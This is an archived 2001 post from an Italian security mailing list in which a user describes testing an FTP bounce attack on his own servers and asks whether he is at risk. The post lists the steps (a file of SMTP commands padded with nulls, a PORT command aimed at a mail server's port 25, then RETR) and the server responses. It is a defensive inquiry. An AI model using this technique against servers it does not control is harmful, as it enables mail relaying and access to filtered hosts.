[ Home | Liste | F.A.Q. |
Risorse | Cerca... ]
[ Data: precedente | successivo | indice ] [ Argomento: precedente | successivo | indice ]
[ Home | Liste | F.A.Q. |
Risorse | Cerca... ]
Archivio: Ottobre 2001 ml@sikurezza.org Soggetto: Ftp bounce Mittente: luigi capuzzello Data: 11 Oct 2001 08:41:15 -0000
Ciao a tutti, volevo sapere chi di voi sa qualcosa di preciso sul come effettuare e difendersi dall' Ftp bounce... Per verificare l'effettiva pericolosità dell' Ftp bounce ho provato a mandarmi una mail in questo modo: - Ho scaricato sul mio Server ftp un file (ad esempio Cmd.xxx) con i comandi per mandarmi la mail (quindi HELO - MAIL FROM - RCPT TO...) - Ho attaccato in coda al file 60K di caratteri nulli (come ho letto da qualche parte) - Mi sono riconesso al mio Server Ftp con una sessione Telnet - Quote PORT X,X,X,X,0,25 (X,X,X,X: inidirizzo del mio server di posta) - Quote RETR cmd.xxx Risultato ottenuto: USER anonymous 331 User name okay, please send complete E-mail address as password. PASS 230 User logged in, proceed. PORT X,X,X,X,0,25 200 PORT Command successful. RETR Cmd.xxx 150 Opening ASCII mode data connection for finale.txt (60102 bytes). 426 Data connection closed, file transfer finale.txt aborted. Quindi non rischio niente o non ho effettuato un reale Ftp Bounce? Grazie Luigi ________________________________________________________ http://www.sikurezza.org - Italian Security Mailing List
[ Home | Liste | F.A.Q. |
Risorse | Cerca... ]
www.sikurezza.org - Italian Security Mailing List
(c) 1999-2005